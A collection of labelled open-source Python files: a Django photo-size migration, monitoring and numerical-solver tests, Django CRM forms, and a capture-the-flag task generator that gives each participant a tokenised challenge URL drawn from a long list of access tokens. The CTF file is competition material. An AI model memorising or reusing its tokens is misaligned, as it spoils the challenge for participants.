# opress/migrations/0002_opress_photosizes.py (portalop/django-opress, Apache-2.0)
# encoding: utf8
from __future__ import unicode_literals

from django.db import models, migrations


def opress_initial_photosizes(apps, schema_editor):
    PhotoSize = apps.get_model('photologue', 'PhotoSize')
    # If there already are PhotoSizes, we are upgrading an existing
    # installation and don't want to auto-create new ones.
    if PhotoSize.objects.count() > 3:
        return
    # (name, width, height, crop); height=None sizes scale by width only.
    sizes = [
        ('normal', 400, None, False),
        ('pagina_icono', 330, 207, True),
        ('pagina_cabecera', 730, 300, True),
        ('bloque_timeline', 140, 110, True),
        ('bloque_ficha', 430, None, False),
        ('bloque_ancho_completo', 730, 300, True),
        ('noticias_icono_portada', 300, 187, True),
        ('noticias_icono_ennoticias', 397, 250, True),
        ('noticia_imagen', 730, 300, True),
        ('noticias_relacionadas', 397, 250, True),
        ('agenda_icono', 90, 90, True),
        ('agenda_imagen', 730, 300, True),
        ('portada_destacado', 1040, 356, True),
        ('autor_foto', 90, 90, True),
        ('prensa_icono', 200, 120, True),
        ('documento_icono', 300, 187, True),
        ('bloque_icono', 300, 187, True),
        ('autor_blog_foto', 330, 207, True),
        ('autor_articulo_foto', 330, 207, True),
        ('blog_imagen', 480, 320, True),
        ('recurso_icono', 140, 140, True),
    ]
    for name, width, height, crop in sizes:
        kwargs = {'name': name, 'width': width, 'crop': crop,
                  'pre_cache': False, 'increment_count': False}
        if height is not None:
            kwargs['height'] = height
        PhotoSize.objects.create(**kwargs)


class Migration(migrations.Migration):

    dependencies = [
        ('opress', '0001_initial'),
    ]

    operations = [
        migrations.RunPython(opress_initial_photosizes),
    ]
# neo4j/tests/test_neo4j.py (deepakarumugham/integrations-extras, BSD-3-Clause)
import pytest
from datadog_checks.base.constants import ServiceCheck
from datadog_checks.neo4j import Neo4jCheck

from .common import METRICS_URL, NEO4J_VERSION

pytestmark = [pytest.mark.integration, pytest.mark.usefixtures('dd_environment')]


def test(aggregator, dd_run_check, instance):
    check = Neo4jCheck('neo4j', {}, [instance])
    dd_run_check(check)
    aggregator.assert_service_check('neo4j.openmetrics.health', ServiceCheck.OK)

    if NEO4J_VERSION.startswith('3.5'):
        aggregator.assert_metric('neo4j.page_cache.hits.count', tags=['db_name:global', f'endpoint:{METRICS_URL}'])
    elif NEO4J_VERSION.startswith(('4.0', '4.1', '4.2', '4.3', '4.4')):
        # All 4.x branches assert the same metrics, so a single
        # prefix-tuple check covers them.
        aggregator.assert_metric('neo4j.page_cache.hits.count', tags=['db_name:global', f'endpoint:{METRICS_URL}'])
        aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:neo4j', f'endpoint:{METRICS_URL}'])
        aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:system', f'endpoint:{METRICS_URL}'])
    else:
        raise Exception(f'unknown neo4j_version: {NEO4J_VERSION}')
# dudley/test/python/run_trilinosSolversOnDudley.py (svn2github/Escript, Apache-2.0)
##############################################################################
#
# Copyright (c) 2003-2018 by The University of Queensland
# http://www.uq.edu.au
#
# Primary Business: Queensland, Australia
# Licensed under the Apache License, version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Development until 2012 by Earth Systems Science Computational Center (ESSCC)
# Development 2012-2013 by School of Earth Sciences
# Development from 2014 by Centre for Geoscience Computing (GeoComp)
#
##############################################################################
from __future__ import print_function, division
__copyright__="""Copyright (c) 2003-2018 by The University of Queensland
http://www.uq.edu.au
Primary Business: Queensland, Australia"""
__license__="""Licensed under the Open Software License version 3.0
http://www.opensource.org/licenses/osl-3.0.php"""
__url__="https://launchpad.net/escript-finley"
"""
Test suite for PDE solvers on dudley
"""
from test_simplesolve import SimpleSolveTestCase
import esys.escriptcore.utestselect as unittest
from esys.escriptcore.testing import *
from esys.dudley import Rectangle, Brick
from esys.escript import hasFeature
from esys.escript.linearPDEs import SolverOptions
HAVE_TRILINOS = hasFeature('trilinos')
skip_muelu_long = False #hasFeature("longindex")
# number of elements in the spatial directions
NE0=12
NE1=12
NE2=8
OPTIMIZE=True
@unittest.skipIf(not HAVE_TRILINOS, "Trilinos not available")
class SimpleSolveOnTrilinos(SimpleSolveTestCase):
    pass
### BiCGStab + Jacobi
class Test_SimpleSolveDudleyRect_Trilinos_BICGSTAB_Jacobi(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.BICGSTAB
        self.preconditioner = SolverOptions.JACOBI

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_BICGSTAB_Jacobi(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.BICGSTAB
        self.preconditioner = SolverOptions.JACOBI

    def tearDown(self):
        del self.domain

### PCG + Jacobi
class Test_SimpleSolveDudleyRect_Trilinos_PCG_Jacobi(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.PCG
        self.preconditioner = SolverOptions.JACOBI

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_PCG_Jacobi(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.PCG
        self.preconditioner = SolverOptions.JACOBI

    def tearDown(self):
        del self.domain

### TFQMR + Jacobi
class Test_SimpleSolveDudleyRect_Trilinos_TFQMR_Jacobi(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.TFQMR
        self.preconditioner = SolverOptions.JACOBI

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_TFQMR_Jacobi(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.TFQMR
        self.preconditioner = SolverOptions.JACOBI

    def tearDown(self):
        del self.domain

### MINRES + Jacobi
class Test_SimpleSolveDudleyRect_Trilinos_MINRES_Jacobi(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.MINRES
        self.preconditioner = SolverOptions.JACOBI

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_MINRES_Jacobi(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.MINRES
        self.preconditioner = SolverOptions.JACOBI

    def tearDown(self):
        del self.domain

### BiCGStab + Gauss-Seidel
class Test_SimpleSolveDudleyRect_Trilinos_BICGSTAB_GaussSeidel(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.BICGSTAB
        self.preconditioner = SolverOptions.GAUSS_SEIDEL

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_BICGSTAB_GaussSeidel(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.BICGSTAB
        self.preconditioner = SolverOptions.GAUSS_SEIDEL

    def tearDown(self):
        del self.domain

### PCG + AMG
@unittest.skipIf(skip_muelu_long, "MueLu AMG incompatible with index type long")
class Test_SimpleSolveDudleyRect_Trilinos_PCG_AMG(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.PCG
        self.preconditioner = SolverOptions.AMG

    def tearDown(self):
        del self.domain

@unittest.skipIf(skip_muelu_long, "MueLu AMG incompatible with index type long")
class Test_SimpleSolveDudleyBrick_Trilinos_PCG_AMG(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.PCG
        self.preconditioner = SolverOptions.AMG

    def tearDown(self):
        del self.domain

### TFQMR + Gauss-Seidel
class Test_SimpleSolveDudleyRect_Trilinos_TFQMR_GaussSeidel(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.TFQMR
        self.preconditioner = SolverOptions.GAUSS_SEIDEL

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_TFQMR_GaussSeidel(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.TFQMR
        self.preconditioner = SolverOptions.GAUSS_SEIDEL

    def tearDown(self):
        del self.domain

### MINRES + AMG
@unittest.skipIf(skip_muelu_long, "MueLu AMG incompatible with index type long")
class Test_SimpleSolveDudleyRect_Trilinos_MINRES_AMG(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.MINRES
        self.preconditioner = SolverOptions.AMG

    def tearDown(self):
        del self.domain

@unittest.skipIf(skip_muelu_long, "MueLu AMG incompatible with index type long")
class Test_SimpleSolveDudleyBrick_Trilinos_MINRES_AMG(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.MINRES
        self.preconditioner = SolverOptions.AMG

    def tearDown(self):
        del self.domain

### BiCGStab + RILU
class Test_SimpleSolveDudleyRect_Trilinos_BICGSTAB_RILU(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.BICGSTAB
        self.preconditioner = SolverOptions.RILU

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_BICGSTAB_RILU(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.BICGSTAB
        self.preconditioner = SolverOptions.RILU

    def tearDown(self):
        del self.domain

### PCG + RILU
class Test_SimpleSolveDudleyRect_Trilinos_PCG_RILU(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.PCG
        self.preconditioner = SolverOptions.RILU

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_PCG_RILU(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.PCG
        self.preconditioner = SolverOptions.RILU

    def tearDown(self):
        del self.domain
### TFQMR + RILU
class Test_SimpleSolveDudleyRect_Trilinos_TFQMR_RILU(SimpleSolveOnTrilinos):
    def setUp(self):
        # Stray third positional argument dropped to match every other
        # Rectangle test domain in this suite.
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.TFQMR
        self.preconditioner = SolverOptions.RILU

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_TFQMR_RILU(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.TFQMR
        self.preconditioner = SolverOptions.RILU

    def tearDown(self):
        del self.domain
### MINRES + RILU
class Test_SimpleSolveDudleyRect_Trilinos_MINRES_RILU(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.MINRES
        self.preconditioner = SolverOptions.RILU

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_MINRES_RILU(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.MINRES
        self.preconditioner = SolverOptions.RILU

    def tearDown(self):
        del self.domain

### PCG + ILUT
class Test_SimpleSolveDudleyRect_Trilinos_PCG_ILUT(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.PCG
        self.preconditioner = SolverOptions.ILUT

    def tearDown(self):
        del self.domain

class Test_SimpleSolveDudleyBrick_Trilinos_PCG_ILUT(SimpleSolveOnTrilinos):
    def setUp(self):
        self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
        self.package = SolverOptions.TRILINOS
        self.method = SolverOptions.PCG
        self.preconditioner = SolverOptions.ILUT

    def tearDown(self):
        del self.domain
if __name__ == '__main__':
    run_tests(__name__, exit_on_failure=True)
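The test suite above spells out each solver/preconditioner pair as a hand-written class. A small sketch of deriving the covered combinations programmatically; the pair list is read off the class names above, not an escript API:

```python
# Method/preconditioner pairs covered by the suite (transcribed, not generated).
pairs = [
    ('BICGSTAB', 'Jacobi'), ('PCG', 'Jacobi'), ('TFQMR', 'Jacobi'),
    ('MINRES', 'Jacobi'), ('BICGSTAB', 'GaussSeidel'), ('PCG', 'AMG'),
    ('TFQMR', 'GaussSeidel'), ('MINRES', 'AMG'), ('BICGSTAB', 'RILU'),
    ('PCG', 'RILU'), ('TFQMR', 'RILU'), ('MINRES', 'RILU'), ('PCG', 'ILUT'),
]

# Two domains (Rectangle, Brick) per pair gives the 26 test classes above.
class_names = [
    f'Test_SimpleSolveDudley{dom}_Trilinos_{method}_{prec}'
    for method, prec in pairs
    for dom in ('Rect', 'Brick')
]

assert len(class_names) == 26
assert 'Test_SimpleSolveDudleyRect_Trilinos_PCG_ILUT' in class_names
```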
# Content/Scripts/uepy/umg.py (dfb/uepy, BSD-2-Clause)
from _uepy import *
from _uepy._umg import *
# tasks-deploy/red-button/generate.py (irdkwmnsb/lkshl-ctf, MIT)
TITLE = "Красная кнопка"  # "Red Button"
STATEMENT_TEMPLATE = '''
[http://red-button.ctf.sicamp.ru:8080/{0}](http://red-button.ctf.sicamp.ru:8080/{0})
'''
def generate(context):
    participant = context['participant']
    token = tokens[participant.id % len(tokens)]
    return TaskStatement(TITLE, STATEMENT_TEMPLATE.format(token))
tokens = ['21444ab76fc804c311d99a7e9ffcbc85', '45bc45d74c18e4f0428374f50af99e2e', 'e6204c309cfdf07bafa10fbded85f77b', '198f868e7a4c272ac600a4e0cb2a0c6a', '56882d25734c49a8acd8117e833a6df2', 'aa1834490208a4a2084c62a886ddca2f', 'c4e2e0c9f0a5bc10a5a00e602c72935e', 'a2fc7b72f8f27dbe22edfe2abd1b5807', 'e066d9c6b8ef5713dac0190951456077', '6294b65f5de96a4b2489461f8189e301', '50ad7a7a4330afa12a515fc7c7cad98a', 'b5542b7cc4fd27897f7f55d122d0ddf8', 'f7d0bcbe8bd19d01f07581e4996ba2c8', '3445d10a65cb088ef2f85caa859f427a', 'b14463e8d7fbe23f62a91dacc9113def', '6c644fe9fa94603b1542703934800fc4', 'd74dc2c8cc0286490e7d0916ea50693b', 'ca46b8ad0840cfa11fb703fffc1e9d53', '34d982cdf0d571a4889f70ad4de030f2', '9539dfbc1487de9d561705c962167c43', 'c041556c1dd644babe261e795556f461', '0ba7534117dc45f85005aebbcf732892', 'dbf4d7623d9c1cc1746830a81fd8d1e1', '82ca7757cc5d99df4be5aa713c410835', '1e8da48809533ed8f2b7d20fd2d23ef1', 'c69d88712f5b6379b2f2557c8c2e9633', '3435d0291e3db60e5b64bf8c31aa9eee', '1d4db509d2cf85591a1954c138ea248e', '36e30de4c10cb765ef23936ef8383445', '78a28d6617212d28985a2e54501f9b5a', 'b480788207644ae594c3e048a6efd463', '9160a90184ffef578cc0f90c7e88e7df', '0cb8b33939b48bfdbc99b8935e178d64', 'e448b4b9f80af486f9a2d6768bca8439', '5d010eb22bb8d67ba98886bc605a5489', '8503a9318bb7b1dc173bd7fc3b1fc039', '03a47a82fe761b2ff5dd9c092c1815e7', '28b42336892aff07fd775426131e1ab2', '197b222047dce241d0a2ff4a8fcf8a7a', '17e0ae03e4af6208944d9769dbcf9582', '0404bc02187b142300e3e015de2347c6', '965d9836a7a121840c40789869563965', '0e136e2299986f6c522a7a1021bc775a', 'defef71741d93b90d18a7e574e18b57e', 'a28f27d2ffeee6d6f7be2ae912a071a0', 'eb35345e6a26a7388b2102c0e1fbadfe', '044488da2b18e5284522673e4855d576', '69dc88f877568971319438af10e87afa', 'b88635c6a486ccc9b0f6516304561b22', '7e5432e63cef3062917b4de46a8eafb5', '35e801fc551f8b89fc74599b9146ce57', 'f28462a1033c9430bd7ca44825f2e7e4', '666ea8d66978f2fb5f89cf9166d086e4', 'e88aec8e4eceda12e6bf9c5dc3eafe40', '571c2baa6b274d219b35ac63a950c6f1', 
'636e5e9806136f7c955c267e93c86aec', 'c8e9c1e89f02ef259eefb9bd4f081424', '1345a3275fd61112edae89b467dfba76', '3b606300513e10aaf619c3abe1293a33', '484a6509294a2a4f6b43e44be007e71d', '48a0f2e6e56782650d8d2d4b69f56634', 'd4d2289b4fec73b39e17aea4016ec399', '63bf08514b96228ad42568002c52c003', 'fdf0afc7f915006f1c14bedf8582b7b4', 'b0955f92bd09b64c2956730236561e4d', 'af398281bbe63809c472df7e2126b186', 'fc44b52adff12ab46e73948df4aa036f', '4d08c42a9542cc4d124cde780733ef3b', '9f66f45b03e8ca58394c277864dae3a0', 'fb360585bcf60b965d5fe0f58b45ea2a', '633574f832553142836dcb391d619631', '255408410b2821831e2cdd806796298a', 'b4f9853ebc74b47eaa8e08ff01557300', 'cac3cc62de1fa416f6cfc9fa865cb951', '27a79e749bb3812eb2b62b627d0f3692', '04305ad76292e7dea9a4c2e7a72c22f4', '507f355787daff3245e08eecc86ff089', 'e802055ee9084e553d617846dd7b784e', '105fb35e2b335ef08275b9c71ac57b69', 'ad9cd7fb0d86b0c46cd77614dc236575', '395ca33e04ad84168fe7cc5b294188a7', 'fc99e9570aa1e73162f0a3950d671d49', '6fb78cedd3fc23d4427b8849953325bd', '1af2da2cb628c40174131a337606edfb', '4fc4390da1c42df75a89e3a77f022aad', '79cc98515b7294e25fa8640b7fe6f206', '79ce433d34eed22079b85686b77013c5', '2ec61e16ada8be8c5061d2938296cc16', 'be6c4c0f7cffad97c0c5a70440ff0821', '628b3363ca7b8f0dc09aca7753d85e0d', 'bf8dbf137d68fec4c46a389f82aaf5c7', '795c107a8cd8f9aff51b53e0df124437', '46f73f2a62e94cf40438f939ca622240', 'fdab5de855f08381cd72494692f7db67', 'e7cf2a8c144ff1b1ccbaefe838cf83b5', 'dedc91d82b6ccff5bfdfc48d0d8fcd9c', 'd4afe54e9f72a5f286e6d1795be0b9be', '8ba7808e7ee2ae95da22fb1b58e8a8ff', 'fd45dac828d4dea5dfbbba900bd831fa', 'fba4f3c18f877746910786581053b689', 'b256ba885f4e84d7c3b23e994879ea04', '9017a7f389cf0597c0d0216c3cd360b8', '08163df1290e12b82629838f11d7f198', 'b80ca797b413c68a6349b99badc82c55', 'fbc6f1463e3dafc35dbeaf05e2cb763a', '105fff32bfb297656d58cf84ef430426', '4c92e25759c72a8f9455d22b6215b67b', 'dc5540924ea2a21a0c758027a34dab71', '21e7e88f91c74a54f4a02bf76991b03f', '0994fc1d2a5f6c492bf8fb180d5dcc0e', 
'7200fddff45d15f16226907349f02fdf', '7d584237a5730f0df29b359e377f210c', '15443d81c54e6889e89aef165cc19e76', '5a1b36d9a6117bf86212a29e8730948f', 'e402e254508b0d788c8f89e6df9f2a6c', '450ddf5a983e2df1485f8a58bbe4d345', 'e62d0bdb6abac8f862cdc98e923f7e6c', '3f518eb74a8c315ad1c4c121dfc35530', 'b1131e6e319740b2d9a94dfbbf148d7e', '5c0829beb918c7e5e3d26d35dde4bc59', '7516547445f7fd2df36b259c0e706eaa', '252381c2a28d932f8eadb6e83869d6f4', 'f876d280f09fd443f6e7b903741de977', 'f6830f785ea0e2646af92c7afe8d948e', '781eff4e440d43c1ad5ede452aba7a2d', '01b2f3629faee9a6aeb054f791fc9fd5', '6121338892cb90556d909535d8afc5b3', '4d2f46e02f5a1ee1b971c820edf30bd2', 'e0117dc99f22c1ff8bb7b40e86d9a30f', 'abc93ad1a918fe685f502a1026e058de', '698eb31fe74f1f657cdc0e7963dc0c73', '00525bb06d05d7444758a15b4fdd1eef', '8b7e6cd232b2e9612eff28cf98a68a12', '44aace24db482c7fea102821feaed499', '6e8fd23971186ec88d83ff034ceabcab', '8de493269e803f95a240015c52b82e03', 'a488234b227e31aec60bd9f3c96ae8e8', '7bbf539f18db26989ac57e9d47acb2a0', 'b10f027b42fba99ce43d6e20ea041d57', '0aaa1d45bf9e71b50abccb70a7e32f23', 'c7143d577599ea626e3bef8183f6456b', '5c64af0cde8c0ec72cf1f561f8d055b9', '6b3f4aeb870956a9ec8a592acd8f742d', '95c9e40a028d821c5a2342e0faa56bd8', 'd7fb49d295618bbcb5215435f18c2525', 'cfec9c317c79407c4b6b9b81ce23593d', 'a7c70b748213656f966a0f08861ebd65', 'f5a0d77f70153e543d47de8c0ab4ce8a', '37eacc86cd29cea5de6e8c884ab09a25', '0e12bc012e024da60e7ab01c367a5f81', 'abd5bf3cff6083cf389568982825ddf4', '5d9e2c80a586c338999ed57dad439aa7', 'fcfadc95363b82fc3aa8f8fdce647b41', '83f92956f4ccdd656ebc8c8fdc724cc1', '45132849ec367f7fc3988e4cc669838c', '1400a29a65ed279223a7146fd596a73f', '2107927c6b74c2ce7fbd7331a3b09889', '5e79858dec2c9839216f27af03d77e9f', '260f514be6c390373758aa5fb485259e', 'eb0567492bf4e43ff9443e2b4ff420d8', '9155b1c0fbeadf7f1e09409011734a23', 'abcc710d8fac72774c62626f021771f9', '0d957fe7206fc6cbfd243e1411f7918d', 'f3915aa28a21e0e212599f3dc89d6162', 'dfc784013251bf1fadadb6a3372bd8bd', 
'f536ae81391686beaf370b138069ac55', '58ba7646f56fa37ce3450a97193019aa', 'e3da4b51388fea77c9c40c209b9fe485', '2a5774842d04a7a5c9e19cf441ac6841', '480b96736f67c18ff3043f65dfee22be', '5db19f3a92bd0bcf99c32df416bb6964', '121695657110b5f93a11657b3531840b', '26ed3c6abc7bdceb66973df26b1e363f', '5a44b61a36d7763f62675ab816a92fc8', 'c7905648eff144a891de232f7ab4186d', '52a49f764c14f34e15790d20fc7af335', '47239449432aacf8791754f91fc19d54', '08bda4212559bc5748b54e7be64c7c03', '59f885d7d058135189e91d55663f8c96', '6cb3a6dedbff716809d61474eb50d7dc', '1877d2d3e9ca6533d16e62418e57ce35', '06f3495c06fb7f3ea038c9631b8ac0f2', '40724ac0d3dc32ab099ac5f6f0c672e8', 'dd7d07fcb7a619c1eb160ec82d2f8fe1', '82ab8b1b6aceef890510d6cb28509f2e', '4d47883923229b56d762f9a7eca98e4b', '96e030c02bc48fae3ff05c35f7afebfa', '4f90865ccdfec90397c858fb8bc8562e', 'b025411b5a340a647b92e667d1e3ec5e', 'c2d9657441d4d7a5149b883e4f4e263d', '2be08283bc5f9f750d74d36d0e583228', '40ee50b0d5ca5d195a26ff5487d7191f', '3d750c73a434c306557c7d52ff401129', '3600fbf3ca9100b1aafb16e5d296e514', '89268477b2917b73b8f012c055d2b666', 'bbc29fe9792105d11bd208982aaa882e', '91776fd87ef846300083a2aecfd4e232', 'b5db77dafcf3767b1182ccc92db4737f', 'c028a516cf9a813aab52231ae28a3ae5', 'f22698d511e87b02555b0f97e829d8db']
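The `generate()` function above assigns each participant a token by `participant.id % len(tokens)`, so the mapping is deterministic and ids that are congruent modulo the pool size share a link. A sketch with a toy three-token pool and hypothetical participant ids:

```python
# Toy pool; the real `tokens` list above holds 32-char hex tokens.
pool = ['aaa', 'bbb', 'ccc']

def token_for(participant_id, tokens=pool):
    # Same indexing rule as generate() above.
    return tokens[participant_id % len(tokens)]

assert token_for(0) == 'aaa'
assert token_for(1) == token_for(4)  # ids 3 apart collide with a 3-token pool
```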
01215a6fcf6da9f1e1cc6573026939711cfa3e91 | 3,457 | py | Python | taotao-cloud-python/taotao-cloud-oldboy/day90-rabbitmq/PerfectCRM-restful api/crm/forms.py | shuigedeng/taotao-cloud-paren | 3d281b919490f7cbee4520211e2eee5da7387564 | [
"Apache-2.0"
] | 47 | 2021-04-13T10:32:13.000Z | 2022-03-31T10:30:30.000Z | taotao-cloud-python/taotao-cloud-oldboy/day90-rabbitmq/PerfectCRM-restful api/crm/forms.py | shuigedeng/taotao-cloud-paren | 3d281b919490f7cbee4520211e2eee5da7387564 | [
"Apache-2.0"
] | 1 | 2021-11-01T07:41:04.000Z | 2021-11-01T07:41:10.000Z | taotao-cloud-python/taotao-cloud-oldboy/day90-rabbitmq/PerfectCRM-restful api/crm/forms.py | shuigedeng/taotao-cloud-paren | 3d281b919490f7cbee4520211e2eee5da7387564 | [
"Apache-2.0"
] | 21 | 2021-04-13T10:32:17.000Z | 2022-03-26T07:43:22.000Z |
from django.forms import ModelForm
from django import forms
from crm import models
class EnrollmentForm(ModelForm):
    def __new__(cls, *args, **kwargs):
        print("__new__", cls, args, kwargs)
        for field_name in cls.base_fields:
            field_obj = cls.base_fields[field_name]
            field_obj.widget.attrs.update({'class': 'form-control'})
            if field_name in cls.Meta.readonly_fields:
                field_obj.widget.attrs.update({'disabled': 'true'})
        return ModelForm.__new__(cls)

    class Meta:
        model = models.StudentEnrollment
        # fields = ['name', 'consultant', 'status']
        fields = "__all__"
        exclude = ['contract_approved_date']
        readonly_fields = ['contract_agreed', ]

    def clean(self):
        '''form default clean method'''
        # print("\033[41;1mrun form default clean method...\033[0m", dir(self))
        # print(self.Meta.admin.readonly_fields)
        print("cleaned_data:", self.cleaned_data)
        if self.errors:
            raise forms.ValidationError("Please fix errors before re-submit.")
        if self.instance.id is not None:  # a change form: check the readonly fields
            for field in self.Meta.readonly_fields:
                old_field_val = getattr(self.instance, field)  # value stored in the database
                form_val = self.cleaned_data.get(field)
                print("field differ compare:", old_field_val, form_val)
                if old_field_val != form_val:
                    self.add_error(field, "Readonly Field: field should be '{value}', not '{new_value}'".format(
                        value=old_field_val, new_value=form_val))


class CustomerForm(ModelForm):
    def __new__(cls, *args, **kwargs):
        print("__new__", cls, args, kwargs)
        for field_name in cls.base_fields:
            field_obj = cls.base_fields[field_name]
            field_obj.widget.attrs.update({'class': 'form-control'})
            if field_name in cls.Meta.readonly_fields:
                field_obj.widget.attrs.update({'disabled': 'true'})
        # print("--new meta:", cls.Meta)
        # print(cls.Meta.exclude)
        return ModelForm.__new__(cls)

    class Meta:
        model = models.CustomerInfo
        # fields = ['name', 'consultant', 'status']
        fields = "__all__"
        exclude = ['consult_content', 'status', 'consult_courses']
        readonly_fields = ['contact_type', 'contact', 'consultant', 'referral_from', 'source']

    def clean(self):
        '''form default clean method'''
        # print("\033[41;1mrun form default clean method...\033[0m", dir(self))
        # print(self.Meta.admin.readonly_fields)
        print("cleaned_data:", self.cleaned_data)
        if self.errors:
            raise forms.ValidationError("Please fix errors before re-submit.")
        if self.instance.id is not None:  # a change form: check the readonly fields
            for field in self.Meta.readonly_fields:
                old_field_val = getattr(self.instance, field)  # value stored in the database
                form_val = self.cleaned_data.get(field)
                print("field differ compare:", old_field_val, form_val)
                if old_field_val != form_val:
                    self.add_error(field, "Readonly Field: field should be '{value}', not '{new_value}'".format(
                        value=old_field_val, new_value=form_val))
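Stripped of the Django plumbing, the readonly check that both `clean()` methods share is just a comparison of stored versus submitted values. A minimal framework-free sketch of that pattern (the helper name `readonly_violations` is invented for illustration, not part of the original code):

```python
def readonly_violations(stored, submitted, readonly_fields):
    """Return {field: (old, new)} for every readonly field whose
    submitted value differs from the value stored in the database."""
    errors = {}
    for field in readonly_fields:
        old_val = stored.get(field)
        new_val = submitted.get(field)
        if old_val != new_val:
            errors[field] = (old_val, new_val)
    return errors
```

In the forms above, each entry in such a dict would become an `add_error()` call against the offending field.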
0155cfb6c76717196c230fbb35786a7e77af0931 | 14,902 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_rib_cfg.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_rib_cfg.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_rib_cfg.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """ Cisco_IOS_XR_ip_rib_cfg
This module contains a collection of YANG definitions
